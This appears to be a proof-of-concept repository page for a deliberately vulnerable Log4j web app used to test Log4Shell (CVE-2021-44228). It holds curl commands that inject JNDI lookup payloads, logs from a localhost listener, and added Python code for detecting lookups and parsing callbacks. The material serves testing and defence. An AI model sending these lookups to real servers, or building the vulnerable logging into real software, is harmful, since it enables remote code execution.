POC details: 54b2eb715f726853c04a43dc640b22ffcfa08f88

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (United States). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j; when that request is written to the log, remote code execution is triggered.
Description
This is a potentially vulnerable Java web application containing Log4j affected by Log4Shell (CVE-2021-44228).
Introduction
# Log4Shell Vulnerable Application(l4s-vulnapp)

This is a potentially vulnerable Java web application containing Log4j(2.14.1) affected by [log4shell](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228)(CVE-2021-44228).

## Verified environment and various versions

- [AdoptOpenJDK 17.0.10+7](https://adoptium.net/temurin/releases/?os=windows&arch=x64&package=jdk&version=17)
- [Gradle 8.6](https://gradle.org/next-steps/?version=8.6&format=all)
- [Gretty 4.1.2](https://plugins.gradle.org/plugin/org.gretty)
- [Apache Tomcat 10.1.15](https://tomcat.apache.org/tomcat-10.1-doc/changelog.html#Tomcat_10.1.15_(schultz))
- [Apache Log4j Core 2.14.1](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.14.1)

## Preparation

- Download and extract [AdoptOpenJDK](https://adoptium.net/temurin/releases/) zip file.
- Set the PATH and JAVA_HOME environment variables.
- Execute `java --version` command to check if AdoptOpenJDK works properly.

[Note]  
If you want to change the JDK version, tomcat port, etc., edit build.gradle.

## Build and Run

Execute Gradle wrapper with build.gradle.

```
# on Linux
./gradlew appRun

# on Windows
.\gradlew.bat appRun
```

Top URL:

```
http://localhost:8080/l4s-vulnapp/
```

[Note]  
Log4Shell triggers only when the app actually logs the tainted input with Log4j.   
For example, accessing the following URL makes the servlet log request data, so Log4Shell can be triggered there.

```
http://localhost:8080/l4s-vulnapp/servlet
```

You can check for Log4Shell by tampering with the "x-param" query value or by adding an "x-log" header to the HTTP request when accessing it.  
Both values are logged by Log4j.  
The lookup only produces an observable callback, however, if a listening server is running at localhost:8081.

```
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D
```
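Because the vulnerable servlet logs both the `x-param` query value and the `x-log` header, a defender wants to spot lookup expressions in exactly those positions before, or while, they reach the logger. The following is an added example and not code from the l4s-vulnapp project: a small Python scanner that percent-decodes request values (repeatedly, so double-encoded input is seen in its final form) and reports any Log4j `${jndi:...}` lookup, using the request from this README as constructed sample input. The function names, the sample header set and the nested-lookup heuristic are this example's own.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Log4j 2.x substitutes ${prefix:...} lookups while formatting a log event;
# the "jndi" prefix is the one exercised by Log4Shell (CVE-2021-44228).
LOOKUP_RE = re.compile(r"\$\{[^{}]*\}")

# Constructed sample, modelled on the request shown in this README.
SAMPLE_REQUEST_LINE = (
    "GET http://localhost:8080/l4s-vulnapp/servlet"
    "?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1"
)
SAMPLE_HEADERS = {
    "Host": "localhost:8080",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "x-log": "${jndi:rmi://localhost:8081/test.txt}",
}


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded input is inspected in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi_lookups(text: str) -> list[str]:
    """Return every ${...} lookup in text whose prefix is 'jndi' (case-folded).
    Other prefixes such as ${date:...} are legitimate and are not reported."""
    hits = []
    for match in LOOKUP_RE.finditer(text):
        body = match.group(0)[2:-1]
        prefix = body.split(":", 1)[0].strip().lower()
        if prefix == "jndi":
            hits.append(match.group(0))
    # Request data has no legitimate reason to carry a lookup nested inside
    # another one, or an unterminated "${"; report that shape regardless of prefix.
    if text.count("${") > len(LOOKUP_RE.findall(text)):
        hits.append("<nested or malformed lookup>")
    return hits


def scan_request(request_line: str, headers: dict[str, str]) -> list[tuple[str, str]]:
    """Inspect the query string of the request target and every header value.
    Returns (location, lookup) pairs; an empty list means nothing was found."""
    findings = []
    target = request_line.split(" ")[1]
    # parse_qsl percent-decodes once; decode_fully catches further layers.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for hit in find_jndi_lookups(decode_fully(value)):
            findings.append((f"query:{name}", hit))
    for name, value in headers.items():
        for hit in find_jndi_lookups(decode_fully(value)):
            findings.append((f"header:{name.lower()}", hit))
    return findings


if __name__ == "__main__":
    for location, lookup in scan_request(SAMPLE_REQUEST_LINE, SAMPLE_HEADERS):
        print(f"{location}: {lookup}")
```

Run against the README's request this reports the lookup twice, once under `query:x-param` and once under `header:x-log`; a request whose values contain no `${` produces an empty list. The same check is what a WAF rule or a logging filter in front of Log4j would implement, but it is only a detection: the fix remains upgrading log4j-core past the affected version.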

## Verification Results

- HTTP Request
  
  ```
  GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
  Host: localhost:8080
  Connection: keep-alive
  Cache-Control: max-age=0
  sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: http://localhost:8080/l4s-vulnapp/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: ja,en-US;q=0.9,en;q=0.8
  ```

- HTTP Response

  ```
  HTTP/1.1 200
  Content-Type: text/plain;charset=utf-8
  Content-Length: 62
  Date: Fri, 15 Mar 2024 18:42:56 GMT
  Keep-Alive: timeout=60
  Connection: keep-alive

  Hello
  Logging to console using vulnerable Log4j2 by parameter
  ```

- RMI Request by l4s-vulnapp

  ```
  2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
  2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
  2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
  2024/03/16 03:42:55: [Hex data] ===== start =====
  2024/03/16 03:42:56: 00000000   4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00  JRMI..K.........
  2024/03/16 03:42:56: 00000010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2024/03/16 03:42:56: [Hex data] =====  end  =====
  2024/03/16 03:42:56: [Raw data] ===== start =====
  2024/03/16 03:42:56: JRMI
  2024/03/16 03:42:56: [Raw data] =====  end  =====
  ```

## Option

l4s-ls.ps1 starts a listening server; run this script from Windows PowerShell or Command Prompt.  
The server accepts binary connections such as LDAP and RMI and displays the received data both as a hex dump and as raw text.  
If the script malfunctions, press Ctrl + C to stop it.

[Caution]  
When running this script for the first time, it is necessary to select "Private Network" in the Windows pop-up.

```
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081
```
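The listener log shown under Verification Results contains the first bytes the vulnerable app sent to the callback port, and decoding them tells a responder what kind of JNDI callback was attempted and from where. The following is an added Python example, not part of l4s-vulnapp or of l4s-ls.ps1: it parses the listener's `[Hex data]` rows and the `Requested from IP` line (the log from this README is embedded as constructed input), recognises the Java RMI transport header (`JRMI` magic, two-byte version, protocol byte; 0x4B is StreamProtocol in the Java RMI specification) and, going one step beyond the README, a BER-encoded LDAP message such as the anonymous BindRequest that a JNDI `ldap://` lookup sends first. The helper names, the constructed LDAP sample bytes, and the assumption that the zero bytes after the header are the listener's unread buffer rather than client data are this example's own.

```python
import re

# Java RMI transport header (Java RMI specification, "RMI Wire Protocol"):
# magic "JRMI", a 2-byte version, then one protocol byte.
RMI_MAGIC = b"JRMI"
RMI_PROTOCOLS = {0x4B: "StreamProtocol", 0x4C: "SingleOpProtocol", 0x4D: "MultiplexProtocol"}
LDAP_BIND_REQUEST_TAG = 0x60  # [APPLICATION 0] BindRequest

# Constructed input: the l4s-ls.ps1 output shown in this README.
LISTENER_LOG = """\
2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
2024/03/16 03:42:55: [Hex data] ===== start =====
2024/03/16 03:42:56: 00000000   4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00  JRMI..K.........
2024/03/16 03:42:56: 00000010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
2024/03/16 03:42:56: [Hex data] =====  end  =====
"""

# Constructed sample (not from the README): an LDAPv3 anonymous BindRequest
# with messageID 1, the first message a JNDI ldap:// lookup sends.
LDAP_BIND_SAMPLE = bytes.fromhex("300c020101600702010304008000")

HEX_ROW_RE = re.compile(r"\b[0-9A-Fa-f]{8}\s+((?:[0-9A-Fa-f]{2}\s)+)")
SOURCE_RE = re.compile(r'Requested from IP: "([^"]+)" Port: (\d+)')


def parse_hexdump(log_text: str) -> bytes:
    """Collect the byte columns of every offset row in the [Hex data] block."""
    data = bytearray()
    for line in log_text.splitlines():
        row = HEX_ROW_RE.search(line)
        if row:
            data.extend(int(pair, 16) for pair in row.group(1).split())
    return bytes(data)


def parse_source(log_text: str):
    """Return (ip, port) of the connecting client, or None if it was not logged."""
    m = SOURCE_RE.search(log_text)
    return (m.group(1), int(m.group(2))) if m else None


def classify_callback(data: bytes) -> dict:
    """Identify the protocol spoken by the first bytes of a callback connection."""
    if data[:4] == RMI_MAGIC:
        if len(data) < 7:
            return {"kind": "rmi", "error": "truncated header"}
        proto = data[6]
        return {
            "kind": "rmi",
            "version": int.from_bytes(data[4:6], "big"),
            "protocol": RMI_PROTOCOLS.get(proto, f"unknown(0x{proto:02x})"),
        }
    # LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp ... }.
    # Only short-form BER lengths (< 128) are handled; the initial bind is small.
    if len(data) >= 5 and data[0] == 0x30 and data[1] < 0x80 and data[2] == 0x02:
        id_len = data[3]
        op_index = 4 + id_len
        if op_index < len(data):
            return {
                "kind": "ldap",
                "message_id": int.from_bytes(data[4:op_index], "big"),
                "bind_request": data[op_index] == LDAP_BIND_REQUEST_TAG,
            }
    return {"kind": "unknown", "first_bytes": data[:8].hex()}


def summarize(log_text: str) -> dict:
    """One record per listener log: who connected and which protocol they spoke."""
    data = parse_hexdump(log_text)
    # Assumption: zero bytes after the header are the listener's unread
    # buffer, not data sent by the client, so they are not counted.
    return {"source": parse_source(log_text), "bytes": len(data.rstrip(b"\x00")),
            **classify_callback(data)}


if __name__ == "__main__":
    print(summarize(LISTENER_LOG))
    print(classify_callback(LDAP_BIND_SAMPLE))
```

For the README's dump this yields an RMI StreamProtocol handshake (version 2) from 127.0.0.1:53282 with seven meaningful bytes, which is exactly what the `JRMI..K` column of the hex dump shows; the LDAP sample is classified as a BindRequest with message ID 1. A record of this shape (source, protocol, timestamp) is what to keep from a canary listener when reconstructing which hosts attempted lookups.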

## References

- [GitHub - tothi/log4shell-vulnerable-app](https://github.com/tothi/log4shell-vulnerable-app)
- [ももいろテクノロジー - Writing nc (netcat) in PowerShell (2015/4/16)](https://inaz2.hatenablog.com/entry/2015/04/16/025953)

File snapshot
 [4.0K]  /data/pocs/54b2eb715f726853c04a43dc640b22ffcfa08f88
├── [ 602]  build.gradle
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 42K]  gradle-wrapper.jar
│       └── [ 250]  gradle-wrapper.properties
├── [8.5K]  gradlew
├── [2.8K]  gradlew.bat
├── [3.6K]  l4s-ls.ps1
├── [4.4K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  l4svuln
        │       └── [1.5K]  VulnServlet.java
        ├── [4.0K]  resources
        │   └── [ 407]  log4j2.properties
        └── [4.0K]  webapp
            ├── [ 326]  index.html
            └── [4.0K]  WEB-INF
                └── [ 489]  web.xml

9 directories, 11 files